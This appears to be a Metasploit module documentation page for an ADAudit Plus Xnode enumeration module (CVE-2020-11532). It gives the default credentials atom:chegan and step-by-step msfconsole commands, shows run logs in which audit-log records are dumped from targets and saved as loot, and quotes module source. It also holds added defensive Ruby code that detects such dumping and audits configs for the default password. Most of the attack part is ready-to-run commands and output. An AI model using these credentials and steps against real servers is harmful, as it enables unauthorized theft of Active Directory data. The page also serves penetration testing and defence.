ManageEngine ADAudit Plus Xnode Enumeration - Metasploit


This page contains detailed information about how to use the auxiliary/gather/manageengine_adaudit_plus_xnode_enum Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ManageEngine ADAudit Plus Xnode Enumeration
Module: auxiliary/gather/manageengine_adaudit_plus_xnode_enum
Source code: modules/auxiliary/gather/manageengine_adaudit_plus_xnode_enum.rb
Disclosure date: -
Last modification time: 2022-08-24 16:15:11 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 29118
List of CVEs: CVE-2020-11532

This module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order to dump the contents of Xnode data repositories (tables), which may contain (a limited amount of) Active Directory information including domain names, host names, usernames and SIDs. This module can also be used against patched ADAudit Plus versions if the correct credentials are provided. By default, this module dumps only the data repositories and fields (columns) specified in the configuration file (set via the CONFIG_FILE option). The configuration file is also used to add labels to the values sent by Xnode in response to a query. It is also possible to use the DUMP_ALL option to obtain all data in all known data repositories without specifying data field names. However, note that when using the DUMP_ALL option, the data won't be labeled. This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > show targets
    ... a list of targets ...
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > set TARGET target-id
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > show options
    ... show and set options ...
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus versions if the correct credentials are provided.

The module's check method attempts to authenticate to the remote Xnode server. The default credentials are atom:chegan. If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version. This is mostly done as a sanity check to ensure the Xnode server is working as expected.

Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:

  • Check if the data repository is configured on the target
  • Obtain the total number of records in the data repository
  • Obtain both the lowest and the highest value for the ID field (column). These values will be used to determine the range of possible records to be queried.

If a given data repository exists, the module uses the above information to dump the data repository contents. The maximum number of records returned for a search query is 10. To overcome this, the module performs a series of requests using the dr:/dr_search action, while specifying the ID values for each record. For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:

  1. A request for the records with ID values 15 to 24
  2. A request for the records with ID values 25 to 34
  3. A request for the records with ID values 35 to 41

Empty records are ignored.
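The batching described above, worked through as an added Ruby example (not code from the Metasploit module): id_windows reproduces the 10-record ID windows, and sequential_dump_sources uses the same pattern defensively to flag a client that walks back-to-back windows of one data repository. The event hashes and their field names (src, repo, lo, hi) are assumptions standing in for whatever a proxy or packet capture in front of port 29118 yields, and the sample events are constructed.

```ruby
# Added example: not part of the Metasploit module. Event fields are assumptions.
BATCH_SIZE = 10 # per the page, one search query returns at most 10 records

# Inclusive ID windows needed to cover min_id..max_id, 10 IDs at a time.
# The module output shows IDs as floats (e.g. 1.0), hence the to_i.
def id_windows(min_id, max_id, size = BATCH_SIZE)
  return [] if min_id.nil? || max_id.nil?

  lo = min_id.to_i
  hi = max_id.to_i
  return [] if hi < lo

  (lo..hi).step(size).map { |start| [start, [start + size - 1, hi].min] }
end

# Length of the longest chain of back-to-back windows
# (next lower bound == previous upper bound + 1).
def longest_contiguous_run(windows)
  best = 0
  run = 0
  prev_hi = nil
  windows.uniq.sort.each do |lo, hi|
    run = (prev_hi && lo == prev_hi + 1) ? run + 1 : 1
    best = [best, run].max
    prev_hi = hi
  end
  best
end

# Map [source, repository] => run length for every client that walked at
# least min_run consecutive windows of a single repository.
def sequential_dump_sources(events, min_run: 3)
  events.group_by { |e| [e[:src], e[:repo]] }
        .transform_values { |evs| longest_contiguous_run(evs.map { |e| [e[:lo], e[:hi]] }) }
        .select { |_key, run| run >= min_run }
end

# Constructed sample events (documentation addresses, arrival order shuffled).
SAMPLE_EVENTS = [
  { src: '192.0.2.10', repo: 'AdapDNSAuditLog',        lo: 11,  hi: 20 },
  { src: '192.0.2.10', repo: 'AdapDNSAuditLog',        lo: 1,   hi: 10 },
  { src: '192.0.2.20', repo: 'AdapPowershellAuditLog', lo: 100, hi: 109 },
  { src: '192.0.2.10', repo: 'AdapDNSAuditLog',        lo: 21,  hi: 30 },
  { src: '192.0.2.10', repo: 'AdapDNSAuditLog',        lo: 31,  hi: 40 },
  { src: '192.0.2.20', repo: 'AdapPowershellAuditLog', lo: 500, hi: 509 }
].freeze

if __FILE__ == $PROGRAM_NAME
  # The page's own example: lowest ID 15, highest ID 41.
  p id_windows(15, 41)
  # Request volume a full dump of the second scenario's DNS repository implies.
  puts "IDs 1..926 need #{id_windows(1.0, 926.0).length} search requests"
  sequential_dump_sources(SAMPLE_EVENTS).each do |(src, repo), run|
    puts "ALERT #{src} walked #{run} consecutive ID windows of #{repo}"
  end
end
```

The request count from id_windows gives a baseline for alert thresholds: a full dump of a repository with IDs up to 926 produces dozens of near-identical searches from one client within seconds.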

To view the raw Xnode requests and responses, enter set VERBOSE true before running the module.

By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file. The configuration file can be set via the CONFIG_FILE option, but this is not required because a default config file exists at data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml that will be used if CONFIG_FILE is not set.

The configuration file is also used to add labels to the values sent by Xnode in response to a query. This means that for every value in the Xnode response, the module will add the corresponding field name to the results before writing those to a JSON file in ~/.msf4/loot.

It is also possible to use the DUMP_ALL option to obtain all data in all known data repositories without specifying data field names. However, note that when using this option the data won't be labeled.

This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.

Installation Information


Vulnerable versions of ADAudit Plus are available here. All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against vulnerable versions from the archives will make data enumeration impossible because the free trials for those versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.

However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions, so it is possible to test the modules against patched versions as long as the correct credentials are provided.

A free 30-day trial of the latest version of ADAudit Plus can be downloaded here. To install, just run the .exe and follow the instructions.

In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps:

  • Open the Xnode config file at <install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf
  • Note down the username and password
  • Insert the following line: xnode.connector.accept_remote_request = true

To launch ADAudit Plus, run Command Prompt as administrator and run: <install_dir>\bin\run.bat
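A defender can check the same file for the two conditions this module depends on. The following Ruby audit is an added example, not ManageEngine or Metasploit code; it assumes the file consists of key = value lines, matches the default password by value because the credential key names are not given on this page, and runs on constructed sample configs whose placeholder.* keys are hypothetical.

```ruby
# Added example: not ManageEngine or Metasploit code.
DEFAULT_PASS = 'chegan' # default Xnode password stated on this page
REMOTE_KEY   = 'xnode.connector.accept_remote_request' # key quoted on this page

# Parse "key = value" lines into a hash.
# Assumption: blank lines and lines starting with '#' carry no settings.
def parse_xnode_conf(text)
  text.each_line.with_object({}) do |line, conf|
    line = line.strip
    next if line.empty? || line.start_with?('#')

    key, value = line.split('=', 2)
    next if value.nil?

    conf[key.strip] = value.strip
  end
end

# Return the list of findings for one dataengine-xnode.conf.
def audit_xnode_conf(text)
  conf = parse_xnode_conf(text)
  findings = []
  # Key-agnostic: any setting whose value is the shipped default password.
  findings << :default_password if conf.values.include?(DEFAULT_PASS)
  # Xnode answers non-local clients only when this is switched on.
  findings << :remote_requests_enabled if conf[REMOTE_KEY].to_s.downcase == 'true'
  findings
end

# Constructed sample: default credentials and remote access enabled.
# The placeholder.* key names are hypothetical.
WEAK_CONF = <<~CONF
  # constructed sample
  placeholder.username = atom
  placeholder.password = chegan
  xnode.connector.accept_remote_request = true
CONF

# Constructed sample: changed password, remote-request line not present.
HARDENED_CONF = <<~CONF
  # constructed sample
  placeholder.username = atom
  placeholder.password = S0me-Long-Unique-Value
CONF

if __FILE__ == $PROGRAM_NAME
  { 'weak' => WEAK_CONF, 'hardened' => HARDENED_CONF }.each do |name, text|
    findings = audit_xnode_conf(text)
    puts "#{name}: #{findings.empty? ? 'no findings' : findings.join(', ')}"
  end
end
```

Both findings together mean the host answers this module as shown in the scenarios; either one alone still warrants a fix, plus a firewall rule limiting TCP 29118 to hosts that need it.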

Verification Steps


  1. Start msfconsole
  2. Do: use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
  3. Do: set RHOSTS [IP]
  4. Do: run

Options


CONFIG_FILE

YAML file specifying the data repositories (tables) and fields (columns) to dump.

DUMP_ALL

Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.

Scenarios


ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options

Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name         Current Setting                                                Required  Description
   ----         ---------------                                                --------  -----------
   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
                ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        29118                                                          yes       The target port (TCP)
   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
[*] Running module against 192.168.1.41

[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.41:29118 - Target seems to be Xnode.
[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
[*] Auxiliary module execution completed

ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)

msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
password => custom_password
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options 

Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name         Current Setting                                                                                                 Required  Description
   ----         ---------------                                                                                                 --------  -----------
   CONFIG_FILE  /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
                ode_conf.yaml
   DUMP_ALL     false                                                                                                           no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
   PASSWORD     custom_password                                                                                                 yes       Password used to authenticate to the Xnode server
   RHOSTS       192.168.1.25                                                                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        29118                                                                                                           yes       The target port (TCP)
   USERNAME     atom                                                                                                            yes       Username used to authenticate to the Xnode server

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run

[*] Running module against 192.168.1.25

[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
[*] Auxiliary module execution completed
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >


Msfconsole Usage


Here is how the gather/manageengine_adaudit_plus_xnode_enum auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show info

       Name: ManageEngine ADAudit Plus Xnode Enumeration
     Module: auxiliary/gather/manageengine_adaudit_plus_xnode_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Sahil Dhar
  Erik Wynter

Check supported:
  Yes

Basic options:
  Name         Current Setting                             Required  Description
  ----         ---------------                             --------  -----------
  CONFIG_FILE  /opt/metasploit-framework/embedded/framewo  no        YAML file specifying the data repositories (tables) and fields (columns) to
               rk/data/exploits/manageengine_xnode/CVE-20            dump
               20-11532/adaudit_plus_xnode_conf.yaml
  DUMP_ALL     false                                       no        Dump all data from the available data repositories (tables). If true, CONFIG
                                                                     _FILE will be ignored.
  PASSWORD     chegan                                      yes       Password used to authenticate to the Xnode server
  RHOSTS                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                                                     Using-Metasploit
  RPORT        29118                                       yes       The target port (TCP)
  USERNAME     atom                                        yes       Username used to authenticate to the Xnode server

Description:
  This module exploits default admin credentials for the DataEngine 
  Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order 
  to dump the contents of Xnode data repositories (tables), which may 
  contain (a limited amount of) Active Directory information including 
  domain names, host names, usernames and SIDs. This module can also 
  be used against patched ADAudit Plus versions if the correct 
  credentials are provided. By default, this module dumps only the 
  data repositories and fields (columns) specified in the 
  configuration file (set via the CONFIG_FILE option). The 
  configuration file is also used to add labels to the values sent by 
  Xnode in response to a query. It is also possible to use the 
  DUMP_ALL option to obtain all data in all known data repositories 
  without specifying data field names. However, note that when using 
  the DUMP_ALL option, the data won't be labeled. This module has been 
  successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) 
  running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) 
  running on Windows Server 2019.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-11532
  https://packetstormsecurity.com/files/157609

Module Options


This is a complete list of options available in the gather/manageengine_adaudit_plus_xnode_enum auxiliary module:

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show options

Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name         Current Setting                            Required  Description
   ----         ---------------                            --------  -----------
   CONFIG_FILE  /opt/metasploit-framework/embedded/framew  no        YAML file specifying the data repositories (tables) and fields (columns) to
                ork/data/exploits/manageengine_xnode/CVE-            dump
                2020-11532/adaudit_plus_xnode_conf.yaml
   DUMP_ALL     false                                      no        Dump all data from the available data repositories (tables). If true, CONFIG
                                                                     _FILE will be ignored.
   PASSWORD     chegan                                     yes       Password used to authenticate to the Xnode server
   RHOSTS                                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                                                     Using-Metasploit
   RPORT        29118                                      yes       The target port (TCP)
   USERNAME     atom                                       yes       Username used to authenticate to the Xnode server

Advanced Options


Here is a complete list of advanced options supported by the gather/manageengine_adaudit_plus_xnode_enum auxiliary module:

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show advanced

Module advanced options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   AutoCheck                true             no        Run check before exploit
   CHOST                                     no        The local client address
   CPORT                                     no        The local client port
   ConnectTimeout           10               yes       Maximum number of seconds to establish a TCP connection
   ForceExploit             false            no        Override check result
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                 no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLServerNameIndication                   no        SSL/TLS Server Name Indication (SNI)
   SSLVerifyMode            PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion               Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
                                                       ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                  false            no        Enable detailed status messages
   WORKSPACE                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/manageengine_adaudit_plus_xnode_enum module can do:

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/manageengine_adaudit_plus_xnode_enum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check the code snippets below, taken from the module source code, for possible causes. This can often help in identifying the root cause of the problem.

An unexpected error occurred whilst running this module. Please raise a bug ticket!


Here is a relevant code snippet related to the "An unexpected error occurred whilst running this module. Please raise a bug ticket!" error message:

    when 1
      return Exploit::CheckCode::Safe(res_msg)
    when 2
      return Exploit::CheckCode::Unknown(res_msg)
    else
      return Exploit::CheckCode::Unknown('An unexpected error occurred whilst running this module. Please raise a bug ticket!')
    end
  end

  def run
    # check if we already have a socket, if not, create one

Obtained unexpected Xnode "de_health" status: "<VALUE>"


Here is a relevant code snippet related to the "Obtained unexpected Xnode "de_health" status: "<VALUE>"" error message:

    if res_code == 0
      if res_health['response']['de_health'] == 'GREEN'
        print_status('Obtained expected Xnode "de_health" status: "GREEN".')
      else
        print_warning("Obtained unexpected Xnode \"de_health\" status: \"#{res_health['response']['de_health']}\"")
      end
    end

    # get the Xnode info
    info_warning_message = 'Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.'

Failed to obtain the Xnode version.


Here is a relevant code snippet related to the "Failed to obtain the Xnode version." error message:

    if res_code == 0
      if res_info['response'].keys.include?('xnode_version')
        print_status("Target is running Xnode version: \"#{res_info['response']['xnode_version']}\".")
      else
        print_warning('Failed to obtain the Xnode version.')
      end

      if res_info['response'].keys.include?('xnode_installation_path')
        print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
      else

Failed to obtain the Xnode installation path.


Here is a relevant code snippet related to the "Failed to obtain the Xnode installation path." error message:

      end

      if res_info['response'].keys.include?('xnode_installation_path')
        print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
      else
        print_warning('Failed to obtain the Xnode installation path.')
      end
    end

    # obtain the total number of records and the min and max record ID numbers for each repo, which is necessary to enumerate the records
    repo_record_info_hash = {}

None of the repositories specified contained any data!


Here is a relevant code snippet related to the "None of the repositories specified contained any data!" error message:

      }
    end

    # check if we found any repositories that contained any data
    if repo_record_info_hash.empty?
      print_error('None of the repositories specified contained any data!')
      return
    end

    if dump_all
      data_to_dump = ad_audit_plus_data_repos

Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.


Here is a relevant code snippet related to the "Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true." error message:

    else
      data_to_dump = grab_config(config_file)

      case data_to_dump
      when config_status::CONFIG_FILE_DOES_NOT_EXIST
        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
      when config_status::CANNOT_READ_CONFIG_FILE
        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
      when config_status::DATA_TO_DUMP_EMPTY
        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
      when config_status::DATA_TO_DUMP_WRONG_FORMAT

Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.


Here is a relevant code snippet related to the "Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted." error message:

      case data_to_dump
      when config_status::CONFIG_FILE_DOES_NOT_EXIST
        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
      when config_status::CANNOT_READ_CONFIG_FILE
        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
      when config_status::DATA_TO_DUMP_EMPTY
        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
      when config_status::DATA_TO_DUMP_WRONG_FORMAT
        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
      end

The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.


Here is a relevant code snippet related to the "The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true." error message:

      when config_status::CONFIG_FILE_DOES_NOT_EXIST
        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
      when config_status::CANNOT_READ_CONFIG_FILE
        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
      when config_status::DATA_TO_DUMP_EMPTY
        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
      when config_status::DATA_TO_DUMP_WRONG_FORMAT
        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
      end
    end

Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.


Here is a relevant code snippet related to the "Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true." error message:

      when config_status::CANNOT_READ_CONFIG_FILE
        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
      when config_status::DATA_TO_DUMP_EMPTY
        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
      when config_status::DATA_TO_DUMP_WRONG_FORMAT
        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
      end
    end

    # try and dump the database tables Xnode has access to
    data_to_dump.each do |repo, fields|

Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior.


Here is a relevant code snippet related to the "Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior." error message:

    end

    # try and dump the database tables Xnode has access to
    data_to_dump.each do |repo, fields|
      if fields.blank? && !dump_all
        print_error("Unable to obtain any fields for the data repository #{repo} to query. Skipping this table. Check your config file for this module if this is unintended behavior.")
        next
      end

      # check if we actually found any records for the repo
      next unless repo_record_info_hash.include?(repo)

Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!


Here is a relevant code snippet related to the "Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!" error message:

      total_hits = repo_record_info_hash[repo]['total_hits']
      id_range_lower = repo_record_info_hash[repo]['aggr_min']
      max_id = repo_record_info_hash[repo]['aggr_max']

      if total_hits.nil? || id_range_lower.nil? || max_id.nil?
        print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
        next
      end

      if total_hits == 0
        print_error("No hits found for #{repo}!")

No hits found for <REPO>!


Here is a relevant code snippet related to the "No hits found for <REPO>!" error message:

        print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
        next
      end

      if total_hits == 0
        print_error("No hits found for #{repo}!")
        next
      end

      id_range_upper = id_range_lower + 9
      query_ct = 0

No non-empty records were obtained for <REPO>.


Here is a relevant code snippet related to the "No non-empty records were obtained for <REPO>." error message:

          end
        end
      end

      if results.empty?
        print_error("No non-empty records were obtained for #{repo}.")
        next
      end

      # shorten the data repository name (if necessary) so that it can be used as part of the eventual output file name
      outfile_part = "xnode_#{repo.gsub('Adap', '').gsub('AuditLog', 'audit').gsub('ADReplication', 'ADRepl').downcase}"


Authors


  • Sahil Dhar
  • Erik Wynter

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
